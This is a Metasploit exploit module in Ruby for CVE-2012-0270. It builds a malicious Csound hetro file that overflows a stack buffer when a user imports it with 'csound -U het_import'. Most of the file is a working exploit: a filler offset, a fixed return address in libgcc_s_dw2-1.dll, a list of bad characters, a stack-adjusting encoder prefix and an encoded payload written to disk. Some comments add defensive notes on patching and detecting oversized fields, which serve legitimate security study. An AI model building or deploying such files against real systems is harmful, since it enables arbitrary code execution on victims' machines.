Path: blob/master/modules/exploits/windows/fileformat/csound_getnum_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module for CVE-2012-0270, a stack buffer overflow in Csound's
# handling of hetro files imported from tabular format.
#
# Reviewer notes for defenders:
# * Affected: Csound before 5.16.6 (per the module description). Upgrading to
#   5.16.6 or later is the fix; the gitweb URL under 'References' is presumably
#   the upstream patch commit -- confirm before citing it as such.
# * Trigger: user interaction is required. The victim has to run the import
#   through csound itself ("csound -U het_import ..."); the description states
#   that the standalone het_import converter is not a working path.
# * The module only writes a file to disk; it opens no network connection.
# * The only target listed is Csound 5.15 on 32-bit-era Windows, and the return
#   address points into libgcc_s_dw2-1.dll, so the module relies on that DLL
#   being at a fixed address -- presumably it is not ASLR-relocated in that
#   build (TODO confirm).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata (references, payload constraints, target)
  # and the single FILENAME option naming the output file.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Csound hetro File Handling Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in Csound before 5.16.6.
          The overflow occurs when trying to import a malicious hetro file
          from tabular format.
          In order to achieve exploitation the user should import the malicious
          file through csound with a command like "csound -U het_import msf.csd file.het".
          This exploit doesn't work if the "het_import" command is used directly
          to convert the file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Secunia', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2012-0270'],
          ['OSVDB', '79491'],
          ['BID', '52144'],
          ['URL', 'http://web.archive.org/web/20120514124556/http://secunia.com/secunia_research/2012-3/'],
          ['URL', 'http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f']
        ],
        'Payload' => {
          'Space' => 650,
          # NUL, LF, 0x1a, comma and 0xff are excluded; presumably the tabular
          # parser stops or splits on these bytes (comma/newline look like the
          # field and record separators) -- TODO confirm against the parser.
          'BadChars' => "\x00\x0a\x1a\x2c\xff",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Csound 5.15 / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 132,
              'Ret' => 0x6e955446 # push esp # ret / libgcc_s_dw2-1.dll
            }
          ]
        ],
        'Privileged' => false,
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-02-23',
        # Reliability, stability and side effects were never assessed for this
        # module; plan lab runs on the assumption that the target may crash.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([OptString.new('FILENAME', [false, 'The file name.', 'msf.csd'])])
  end

  # Builds the file contents (filler of target['Offset'] bytes, the target's
  # return address packed as a 32-bit little-endian value, then the encoded
  # payload) and writes them out through file_create.
  #
  # Detection note: the output is one unbroken run of bytes rather than a table
  # of short numeric fields, so -- assuming legitimate tabular hetro input is
  # comma/newline separated numbers -- an input whose first field runs to
  # hundreds of bytes is anomalous and worth flagging before it reaches csound.
  def exploit
    het_data = rand_text(target['Offset'])
    het_data << [target.ret].pack('V') << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(het_data)
  end
end